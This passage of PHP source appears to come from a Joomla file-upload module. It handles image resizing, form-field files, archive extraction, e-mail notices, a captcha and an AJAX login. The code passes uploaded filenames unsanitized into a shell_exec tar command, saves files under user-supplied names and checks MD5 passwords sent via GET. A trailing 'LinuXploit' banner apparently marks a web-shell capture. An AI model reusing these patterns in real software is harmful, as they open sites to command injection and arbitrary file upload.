													if ($thumbfilename !== "") imagePNG($ttim, $thumbfilename);
													$img_compressimg = "";
													$image_resize = true;
													break;
												case 15:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imageWBMP($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
													if ($thumbfilename !== "") imageWBMP($ttim, $thumbfilename);
													break;
													$image_resize = true;
												default:
													$image_resize = false;
													break;
											}
												
											// Only thumbnail, no resize
											if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0) {
												imagedestroy($tim);
												if ($image_resize)
													$results .= JText::_('IMG_ORIG_RESIZE')."<br />";
												else
													$results .= JText::_('IMG_RESIZE_FAIL')."<br />";
											} else {
												$image_resize = false;
											}
											
											imagedestroy($oim);
											if ($thumbfilename !== "") imagedestroy($ttim);
											
										} else {
											
											$fileErr = 1;
											$results .= JText::_('FAIL_REQUEST') . "<br />";
											$_SESSION["failedfile"] .= $_FILES["uploadedfile$mid"]["name"][$cnt]." (".JText::_('IMG_SAVE_FAIL').", ".$errmsg.")</br />";
										}
									}
									
									if (($img = @getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt])) && (!$image_resize) && ($upload_compressimg !== "") && is_numeric($upload_compressimg)) {
										// Compress JPEG? This only happens if no resize!
										list($width, $height, $type, $attr) = getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
										
										// Make sure we have a valid compression ratio
										if ($upload_compressimg > 100 || $upload_compressimg <= 0) $img_compressimg = 100;
										
										if (($type == 2) && (is_numeric($img_compressimg)) && ($fileErr == 0)) {
										
											$oim = imagecreatefromjpeg($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
											
											if (imagejpeg($oim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg)) {
												$fileErr = 0;
												$image_resize = true;
											} else {
												$fileErr = 1;
												$results .= JText::_('FAIL_REQUEST') . "<br />";
												$_SESSION["failedfile"] .= $_FILES["uploadedfile$mid"]["name"][$cnt]." (".JText::_('IMG_COMPRESS_FAIL').")</br />";
											}
											imagedestroy($oim);
										}
										
										// Compress PNG? This only happens if no resize!
										if (($type == 3) && (is_numeric($upload_compressimg)) && ($fileErr == 0)) {
										
											$oim = imagecreatefrompng($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
											
											$img_compressimg = round($upload_compressimg / 100); // Quality is 0-9 for PNG
											if ($img_compressimg >= 10) $img_compressimg = 9; // If user has set quality to 100
											
											if (imagepng($oim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg)) {
												$fileErr = 0;
												$image_resize = true;
											} else {
												$fileErr = 1;
												$results .= JText::_('FAIL_REQUEST') . "<br />";
												$_SESSION["failedfile"] .= $_FILES["uploadedfile$mid"]["name"][$cnt]." (".JText::_('IMG_COMPRESS_FAIL').")</br />";
											}
											imagedestroy($oim);
										}
										
										if ($image_resize)
											$results .= JText::_('IMG_ORIG_COMPRESS')."<br />";
										else
											$results .= JText::_('IMG_COMPRESS_FAIL')."<br />";
									}	
								}

								// If image has been resized it is already saved
								if (!$image_resize) {
									if (move_uploaded_file($_FILES["uploadedfile$mid"]["tmp_name"][$cnt], $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt])) {
										$fileErr = 0;										
									} else {
										$fileErr = 1;
										$results .= JText::_('FAIL_REQUEST') . "<br />";
										$_FILES["uploadedfile$mid"]["name"][$cnt] = "";
									}
								}
								
								
								// Form Fields
								if (($upload_useformsfields == 1) && (strlen($upload_formfields) > 0) && ($fileErr == 0)) {

									$fields = explode(";", $upload_formfields);
									$valname = "";
									$valfile = "";
									$ffform = "";
									$fffield = "";
									$formfieldsemail[$cnt] = "";

									if ($upload_nohtmlencoding == 1)
										$ffform = trim ( $_REQUEST["sfuFormFields$mid"] );
									else
										$ffform = htmlentities ( trim ( $_REQUEST["sfuFormFields$mid"] ) , ENT_NOQUOTES , "utf-8" );
									if ($upload_debug == 1) print_r($_REQUEST);
									
									if ($upload_replacetag == 1) $ffform = str_replace(">", "&gt;", str_replace("<", "&lt;", $ffform));

									if ($upload_debug == 1) $results .= "ffform=$ffform<br/>";
									$ffform = explode("[||]", $ffform);
									
									// If create a row in the form fileds file...
									if (strlen($upload_formfieldsfile) > 0)
										$valfile = $_FILES["uploadedfile$mid"]["name"][$cnt].$upload_formfieldsdiv;
									
									for ($iff = 0; $iff < count($ffform); $iff++) {
										$valname = $ffform[$iff];
										
										$fffield = explode("=", $valname);
										
										foreach ($fields as $fld) {
										
											$valname = "sfuff".$mid."_".$fld."_".$_FILES["uploadedfile$mid"]["name"][$cnt];
											if ($valname === $fffield[0]) {
												if (strlen($upload_formfieldsfile) > 0)
													$valfile .= $fffield[1].$upload_formfieldsdiv;
												else
													$valfile .= $fld."=".$fffield[1]."\n";
												// Store for e-mail, use same counter as file
												$formfieldsemail[$cnt] .= $fld."=".$fffield[1]."\n";
											}
										}
										
										if ($upload_debug == 1) $results .= "valname=$valname<br/>";
										
									}
									
									if (strlen($upload_formfieldsfile) > 0) {
										// Remove last pipe
										$valfile = substr($valfile, 0, -1);
										// Check if we got something
										if ($valfile === $_FILES["uploadedfile$mid"]["name"][$cnt]) 
											$valfile = "";
									}
									
									if ($upload_debug == 1) $results .= "valfile=$valfile<br/>";
									if ((strlen($valfile) > 0) && (strlen($upload_formfieldsfile) == 0)) {
										// Write the file:
											
										$ffFile = $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt] . ".txt";
											
										if ($upload_debug == 1) $results .= "ffFile=$ffFile<br/>";
										$fh = fopen($ffFile, 'w') or $fileErr = 1;
										if ($fileErr == 1) {
											$results .= JText::_('FAIL_FORMFIELDS_FILE') . "<br />";
										} else {
											// For some mysterious reason PHP refuses to write UTF-8 as UTF-8. Some stupid work-around below found at php.net
											$valfile = mb_convert_encoding( $valfile, 'UTF-8'); 
											fwrite($fh, $valfile);
											fclose($fh);
										}
									
									}
									// Store for Form Fields File, use same counter as file
									$formfieldsval[$cnt] = $valfile;
								}
						
								
								if (($upload_popshowpath == 1) && ($fileErr == 0)) {
									$results .= JText::sprintf('FILE_SAVE_AS', '<a href="'.$baseurl.str_replace(" ", "%20", $_FILES["uploadedfile$mid"]["name"][$cnt]).'" target="blank">'.$baseurl.$_FILES["uploadedfile$mid"]["name"][$cnt].'</a>').'<br /><br />';
								}
								
								if ($upload_fileexist === "1" && file_exists($new_filename)) {
									if ($fileErr == 0) {
										// Delete (=replace) of old file
										unlink($new_filename);
									} else {
										// Put original back if something went wrong
										rename($new_filename, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
									}
								}
								//$results .= "<div style=\"width: 90%; text-align: right; \"><input type='button' value='" . JText::_('OK_BUTTON') . "' onclick='document.getElementById(\"div_simplefileuploadmsg\").style.display=\"none\";'></div>";
							}
						}

						// UNZIP
						if (($upload_unzip == 1) && ($fileErr == 0)) {
							if (($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-tar") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-tar-compressed") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/tar-compressed")) {
								//system("tar -zxvf ".$upload_location.$_FILES["uploadedfile$mid"]["name"]);
								$res = shell_exec("cd ".$upload_location.";tar -xvzf ".$_FILES["uploadedfile$mid"]["name"][$cnt].";");
								if ($res === FALSE) {
									$results .= "<p>".JText::_('MSG_UNZIP_ERROR')."</p>";
								} else {
									$results .= "<p>".JText::_('MSG_UNZIP')."</p>";
								}
							}
							if (($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-zip") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/x-zip-compressed") || ($_FILES["uploadedfile$mid"]["type"][$cnt] === "application/zip-compressed")) {
								$zip = new ZipArchive;
								$res = $zip->open($upload_location.$_FILES["uploadedfile$mid"]["name"][$cnt]);
								if ($res === TRUE) {
									$zip->extractTo($upload_location);
									$zip->close();
									$results .= "<p>".JText::_('MSG_UNZIP')."</p>";
								} else {
									$results .= "<p>".JText::_('MSG_UNZIP_ERROR')."</p>";
								}
							}
						}
						$_SESSION["uploaderr$mid"] = $fileErr;
					} else {
						$fileErr = 1;
						$errmsg = "(<span style='color:#dd2222'>".$_FILES["uploadedfile$mid"]["name"][$cnt].")</span><div>".JText::sprintf('FILE_IN_ERROR', $filetype)."<br />&nbsp;&nbsp;[".ModSimpleFileUploaderHelperv13::errCodeToMessage($_FILES["uploadedfile$mid"]["error"][$cnt])."]</div><br />";
						$_SESSION["uploaderr$mid"] = 1;
						if ($upload_showerrmsg == 1)
							$results .= $errmsg;
						else
							$results .= JText::_('UPLOAD_FAILED')."<br /><br />";
						
						if ($written == 0) {
							$filesize = ModSimpleFileUploaderHelperv13::getFileSizePP($upload_maxsize);
							$results .= JText::_('ALLOWED_TYPES') . ": " . $upload_filetypes . "<br />" . JText::_('FILE_MAX_SIZE') . ": " . $filesize . "<br /><br />";
							//$results .= "<div style=\"width: 90%; text-align: right;\"><input type='button' value='" . JText::_('OK BUTTON') . "' onclick='document.getElementById(\"div_simplefileuploadmsg\").style.display=\"none\";'></div>";
							$written = 1;
						}
					}
				} else {
					if ($upload_users === "false") {
						$_SESSION["uploaderr$mid"] = 1;
						$results .= JText::_('NOT_ALLOWED_USER');
					}
				}
			} // end for

			// Create Form Fields file
			if ((count($formfieldsval) > 0) && (strlen($upload_formfieldsfile) > 0)) {
				// Write the file but read first if the same file exists from previous set:
				$valfile = "";
				
				$ffFile = $upload_location . $upload_formfieldsfile;
				
				if (file_exists($ffFile)) {
					//RegExp can't handle pipe, make it escaped
					// !! Not needed for explode(), only deprecated split() !!
					//$upload_formfieldsdiv2 = $upload_formfieldsdiv;
					//if ($upload_formfieldsdiv === "|") $upload_formfieldsdiv2 = "\|";
					
					$fileRows = explode("\n", file_get_contents($ffFile));
					for ($cnt = 0; $cnt<count($fileRows); $cnt++) { 
						$rowdata = $fileRows[$cnt];
						//Remove the UTF-8 chars
						//if (substr($rowdata, 0, 2) === chr(255).chr(254)) $rowdata = substr($rowdata, 2);
//echo "rowdata=$rowdata<br/>";
						if (strpos($rowdata, $upload_formfieldsdiv) >= 0) {
							$rowArray = explode($upload_formfieldsdiv, $rowdata);
							if (strlen($rowArray[0]) > 0) {
								$found = false;
								for ($cnt2 = 0; $cnt2<count($formfieldsval); $cnt2++) {
									$ffArray = explode($upload_formfieldsdiv, $formfieldsval[$cnt2]);
//echo "{".$ffArray[0]."}={".$rowArray[0]."}<br/>";
//echo "replace: [".str_replace($ffArray[0], "", $rowArray[0])."]<br/>";
									// Equal on string seems not reliable. Maybe encoding issues but replace does the trick it seems.
									//if ($ffArray[0] === $rowArray[0]) {
									if (strlen(str_replace($ffArray[0], "", $rowArray[0])) == 0) {
//echo "inside!<br/>";									
										$valfile .= $formfieldsval[$cnt2]."\n";
										$formfieldsval[$cnt2] = "";
										$found = true;
										break;
									}
								}
								if (!$found) $valfile .= $rowdata."\n";
							}
						}
					}
				}

				$fh = fopen($ffFile, 'w') or $fileErr = 1;
				if ($fileErr == 1) {
					$results .= JText::_('FAIL_FORMFIELDS_FILE') . "<br />";
				} else {
				
					for ($cnt = 0; $cnt<count($formfieldsval); $cnt++) {
						// Add the new files here
						if (strlen($formfieldsval[$cnt]) > 0)
							$valfile .= $formfieldsval[$cnt]."\n";
					}
					
					// Don't make the file UTF-8 here as it totally messes up the reading of the file!
					// For some mysterious reason PHP refuses to write UTF-8 as UTF-8. Some stupid work-around below found at php.net
					//$valfile = chr(255).chr(254).mb_convert_encoding( $valfile, 'UTF-16LE', 'UTF-8'); 
					
//echo "valfile=$valfile<br/>";
					fwrite($fh, $valfile);
					fclose($fh);
				}
			
			}
			
			// SHOW DIR CONTENT
			if (($upload_showdircontent == 1) && ($fileErr == 0)) {
				$results .= "<br /><div style=\"text-align: left\">";
				if($bib = @opendir($upload_location)) {
					while (false !== ($lfile = readdir($bib))) {
						//if($lfile != "." && $lfile != ".." && !ereg("^\..+", $lfile) && $lfile != "index.html") {
						if($lfile !== "." && $lfile !== ".." && !preg_match("/^\..+/", $lfile) && $lfile !== "index.html") {
							$fil_list[] = "<a href=\"$upload_location/$lfile\" target=\"blank\">$lfile</a>";
						}
					}
					closedir($bib);
					
					if(is_array($fil_list)) {
						$liste = "<li>" . join("</li><li>", $fil_list) . "</li>";
					} else {
						$liste = "<li>" . JText::_('NO_FILES_FOUND') . " " . $upload_location . "</li>";
					}
					$results .=  "<h2>" . JText::_('FILES_IN_DIR') . " (" . $upload_location . "):</h2><ul>" . $liste . "</ul>";
				} else {
					//die("Could not read files in " . $upload_location);
					$results .=  "<h2>" . JText::_('NO_FILES_FOUND') . "</h2><br/>";
				}
				$results .= "</div><br/>";
			}

			// SEND E-MAIL
			if ((strlen($upload_email) > 0) && ($fileErr == 0)) {
				$to = $upload_email;
				$subject = JText::_('MAIL_SUBJECT');
				$infos = explode("|", $fileInfo);
				$text = "";
				$headers = "";
				//Replace space with %20 for URL
				if ($upload_emailhtml == 0) {
					for ($cnt = 0; $cnt<$fileCnt;  $cnt++) {
						if(strlen($_FILES["uploadedfile$mid"]["name"][$cnt]) > 0)
							$text .= $upload_location.$_FILES["uploadedfile$mid"]["name"][$cnt]." (".$baseurl.str_replace(" ", "%20", $_FILES["uploadedfile$mid"]["name"][$cnt]).")\r\n";
						if (count($formfieldsemail) >= $cnt+1) {
							if (strlen($formfieldsemail[$cnt]) > 0)
								$text .= $formfieldsemail[$cnt] . "\r\n\r\n";
						}
					}
					$body = JText::sprintf('MAIL_BODY', $_SERVER["HTTP_HOST"]);
					$body .= "\r\n\r\n".$text;
					$body .= "\r\n\r\n(Find out more about Simple File Upload for Joomla at http://wasen.net/)";
				} else {
					$text = "<br /><br/><table>";
					for ($cnt = 0; $cnt<$fileCnt; $cnt++) {
						if(strlen($_FILES["uploadedfile$mid"]["name"][$cnt]) > 0)
							$text .= "<tr><td>".$upload_location.$_FILES["uploadedfile$mid"]["name"][$cnt]." (".$baseurl.str_replace(" ", "%20", $_FILES["uploadedfile$mid"]["name"][$cnt]).")</td><td>".$infos[$cnt]."</td></tr>";
							if (count($formfieldsemail) >= $cnt+1) {
								if (strlen($formfieldsemail[$cnt]) > 0) {
									$fields = explode("\n", $formfieldsemail[$cnt]);
									foreach ($fields as $f)
										$text .= "<tr><td>" . $f . "</td></tr>";
								}
							}
					}
					$text .= "<table><br />";
					$body = JText::sprintf('MAIL_BODY', $_SERVER["HTTP_HOST"]);
					if (strlen($users_name) < 5) $users_name = "Anonymous (@".$_SERVER['REMOTE_ADDR'].")";
					$body .= " ".JText::sprintf('BY_USER', $users_name);
					$body .= $text;
					$body .= "<br /><br/><small>(Find out more about Simple File Upload for <a href='http://www.joomla.org/'>Joomla</a> at <a href='http://wasen.net/'>http://wasen.net/</a>)</small>";
					// To send HTML mail, the Content-type header must be set
					$headers = 'MIME-Version: 1.0' . "\r\n";
					$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
					// Additional headers
					//$headers .= 'To: ' . $to . "\r\n";
					$headers .= 'From: ' . $upload_mailfrom . "\r\n";
				}

				if (mail($to, $subject, $body, $headers)) {
					if ($upload_emailmsg == 1)
						$results .= "<p>".JText::_('MSG_SENT')."</p>";
				} else {
					if ($upload_emailmsg == 1)
						$results .= "<p>".JText::_('MSG_FAILED')."(To:".$to.")</p>";
				}
			}

			return $results;
		}
		
		
		function gd_get_info() {
			if (extension_loaded('gd') and
				imagetypes() & IMG_PNG and
				imagetypes() & IMG_GIF and
				imagetypes() & IMG_JPG and
				imagetypes() & IMG_WBMP) {
			   
				return true;
			} else {
				return false;
			}
		}

		function getFileSizePP($filesize) {

			$kb=1024;
			$mb=1048576;
			$gb=1073741824;
			$tb=1099511627776;
			
			if(!$filesize)
				$filesize = '0 B';
			elseif($filesize<$kb)
				$filesize = $filesize.' B';
			elseif($filesize<$mb)
				$filesize = round($filesize/$kb, 2).' KB';
			elseif($filesize<$gb)
				$filesize = round($filesize/$mb, 2).' MB';
			elseif($filesize<$tb)
				$filesize = round($filesize/$gb, 2).' GB';
			else
				$filesize = round($filesize/$tb, 2).' TB';
			
			return $filesize;
		}
		
		function errCodeToMessage($code) {
			$message = "";
			
			switch ($code) {
				case UPLOAD_ERR_INI_SIZE:
					$message = JText::_('UPLOAD_ERR_INI_SIZE');	//"The uploaded file exceeds the upload_max_filesize directive in php.ini";
					break;
				case UPLOAD_ERR_FORM_SIZE:
					$message = JText::_('UPLOAD_ERR_FORM_SIZE');	//"The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form";
					break;
				case UPLOAD_ERR_PARTIAL:
					$message = JText::_('UPLOAD_ERR_PARTIAL');	//"The uploaded file was only partially uploaded";
					break;
				case UPLOAD_ERR_NO_FILE:
					$message = JText::_('UPLOAD_ERR_NO_FILE');	//"No file was uploaded";
					break;
				case UPLOAD_ERR_NO_TMP_DIR:
					$message = JText::_('UPLOAD_ERR_NO_TMP_DIR');	//"Missing a temporary folder";
					break;
				case UPLOAD_ERR_CANT_WRITE:
					$message = JText::_('UPLOAD_ERR_CANT_WRITE');	//"Failed to write file to disk";
					break;
				case UPLOAD_ERR_EXTENSION:
					$message = JText::_('UPLOAD_ERR_EXTENSION');	//"File upload stopped by extension";
					break;

				default:
					$message = JText::_('UPLOAD_ERR_DEFAULT');	//"Unknown upload error";
					break;
			}
			return $message;
		}
		
		function getGIFComment($filename, $upload_debug) {
			
			$retval = "";
			
			$fd = fopen( $filename, 'rb' );
			if ( $fd ) {
				if ($upload_debug == 1) $retval .= "<br/>getGIFComment: File opened!";

				// Read GIF header
				$data = fread( $fd, 6 );
				if ( $data == 'GIF87a' or $data == 'GIF89a' ) {
					if ($upload_debug == 1) $retval .= "<br/>getGIFComment: We've found a GIF";

					$offset = 6;
					// Read Logical Screen Descriptor
					$data = fread( $fd, 7 );
					$offset += 7;
					
					$width = ( ord( $data[1] ) << 8 ) + ord( $data[0] );
					$height = ( ord( $data[3] ) << 8 ) + ord( $data[2] );
					
					if ($upload_debug == 1) $retval .= "<br/>getGIFComment: GIF width: ".$width;
					if ($upload_debug == 1) $retval .= "<br/>getGIFComment: GIF height: ".$height;
					
					$done = false;
					while ( !$done )
					{
						$data = fread( $fd, 1 );
						$offset += 1;
						$blockType = ord( $data[0] );
						
						if ( $blockType == 0x21 ) // Extension Introducer
						{
							$data .= fread( $fd, 1 );
							$offset += 1;
							$extensionLabel = ord( $data[1] );
						
							if ( $extensionLabel == 0xfe ) // Comment Extension
							{
								$commentBlockDone = false;
								$comment = false;
								while ( !$commentBlockDone )
								{
									$data = fread( $fd, 1 );
									$offset += 1;
									$blockBytes = ord( $data[0] );
									
									if ( $blockBytes )
									{
										$data = fread( $fd, $blockBytes );
										$comment .= $data;
										$offset += $blockBytes;
									}
									else
									{
										$commentBlockDone = true;
									}
								}
								if ( $comment ) {
									if ($upload_debug == 1) $retval .= "<br/>getGIFComment: GIF has comment: ".$comment;
									if(stripos($comment, "php") !== false) {
										$retval = "getGIFComment:BLOCK".$retval;
									} else {
										$retval = "getGIFComment:OK".$retval;
									}
									
								} else {
									if ($upload_debug == 1) $retval .= "<br/>getGIFComment: No GIF comment found!";
									$retval = "getGIFComment:OK".$retval;
								}
								$done = true;
							}
						}
						else if ( $blockType == 0x3b ) // Trailer, end of stream
						{
							if ($upload_debug == 1) $retval .= "<br/>getGIFComment: GIF stream terminated by Trailer block";
							$done = true;
						}
						if ( feof( $fd ) ) {
							if ($upload_debug == 1) $retval .= "<br/>getGIFComment: GIF stream terminated by EOF";
							$done = true;
						}
					}
					
				}
				
				
			} else {
				if ($upload_debug == 1) $retval .= "<br/>getGIFComment: File failed!";
			}
			
			return $retval."<br/>";
		
		}
}
	
class SFUAjaxServlet {
	function getCaptcha($sfu_version, $bgcolor, $mid, $source) {
		error_reporting(0);
		/*ini_set ("session.Save_path", $_SERVER['DOCUMENT_ROOT'] . "/mySessions");
		session_start();
		if (isset($_SERVER['REMOTE_HOST'])) {
			session_name($_SERVER['REMOTE_HOST'] . "-captcha");
		} else {
			session_name(uniqid() . "-captcha");
		}*/
		$myCryptBase = "AB0CDE1FG2HIJ3KL4MNO5PQ6RST7UV8WX9YZ";
		$capString = "";
		$image = imagecreatetruecolor(150, 60);
		$white = imagecolorallocate ($image, 255, 255, 255);
		$rndm = imagecolorallocate ($image, rand($bgcolor[0],$bgcolor[1]),  rand($bgcolor[0],$bgcolor[1]),  rand($bgcolor[0],$bgcolor[1]));
		imagefill ($image, 0, 0, $white);
		$folder_captcha_class = JPATH_SITE.DIRECTORY_SEPARATOR.'modules'.DIRECTORY_SEPARATOR.'mod_simplefileuploadv'.$sfu_version.DIRECTORY_SEPARATOR.'tmpl';
		$fontName = $folder_captcha_class."/arial.ttf";
		$myX = 15;
		$myY = 30;
		$angle = 0;
		for ($x = 0; $x <=1000; $x++) {
			$myX = rand(1,148);
			$myY = rand(1,58);
			imageline($image, $myX, $myY, $myX + rand(-5,5), $myY + rand(-5,5), $rndm);
		}
		for ($x = 0; $x <= 4; $x++) {
			$dark = imagecolorallocate ($image, rand(5,128),rand(5,128),rand(5,128));
			$capChar = substr($myCryptBase, rand(1,35), 1);
			$capString .= $capChar;
			$fs = rand (20, 26);
			$myX = 15 + ($x * 28+ rand(-5,5));
			$myY = rand($fs + 2,55);
			$angle = rand(-30, 30);
			ImageTTFText ($image,$fs, $angle, $myX, $myY, $dark, $fontName, $capChar);
		}
		$_SESSION["capString$mid"] = $capString;
		ob_start();
		header ("Content-type: image/jpeg");
		imagejpeg($image,"",95);
		$result = ob_get_contents();
		ob_end_clean();
		if ($source === 'site')
			echo base64_encode($result);
		else
			echo $result;
		imagedestroy($image);
		error_reporting(E_ALL);
	}

	function getContent($action) {
		$retVal = "false";
		
		if ($action === "sfuuser") {
			$user = $_GET["val1"];
			$pass = $_GET["val2"];
			$mid = $_GET["mid"];
			$session_username = "";
			$session_password = "";
			// TODO: Should I fetch this from DB if session has expired before trying to login... Else it will return failed...
			if (isset($_SESSION["upload_username$mid"])) {
				$session_username = $_SESSION["upload_username$mid"];
				$session_password = $_SESSION["upload_password$mid"];
			}
			
			if (strlen($session_username) == 0) {
				// Workaround for missing session user... should be from DB I guess...
				//$retVal = "Credentials not found. Please refresh your session or contact the Administrator to get the login details.";
				$retVal = JText::_('FAIL_CREDENTIALS');
			} else {
				$hashedpw = md5($session_password);
				if ((strcmp($user, $session_username) == 0) && (strcmp($pass, $hashedpw) == 0)) {
					$_SESSION["upload_username_ok$mid"] = $hashedpw;
					$retVal = "true";
				} else {
					//$retVal = "Username and/or password does not match";
					$retVal = JText::_('USER_PASS_FAILED');
					/* debug					$retVal .= "\nGiven user = " . $user;
					$retVal .= "\nGiven pass = " . $pass;
					$retVal .= "\nStored user = " . $session_username;
					$retVal .= "\nStored pass = " . $session_password;
					$retVal .= "\nStored hash = " . md5($session_password);
					*/
				}
			}		
		}
		
		if ($action === "sfucaptcha") {
			$captcha = $_GET["val1"];
			$casesense = $_GET["val2"];
			$mid = $_GET["mid"];
		
			$captchaStored = "";
			
			if (isset($_SESSION["capString$mid"])) 
				$captchaStored = $_SESSION["capString$mid"];
			else
				$retVal = JText::_('FAIL_REQUEST') . "\n\n[Session time-out]";
			
			
			if ($casesense === "1") {
				$captchaStored = strtoupper($captchaStored);
				$captcha = strtoupper($captcha);
			}
			
			if (strlen($captchaStored) > 0) {
				if ($captchaStored === $captcha)
					$retVal = "true";
				else
					$retVal = JText::_('FAULTY_CAPTCHA');
			} else {
				$retVal = JText::_('FAIL_REQUEST');
			}
		}
		
		if ($action === "sfukillsession") {
			
			$ses = session_destroy();
			
			if ($ses)
				$retVal = "Session destroyed";
			else
				$retVal = "Session still alive";
		}

		//global $mainframe;
		$app = JFactory::getApplication();
		echo $retVal;
		//$mainframe->close();
		$app->close();
	}
	
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit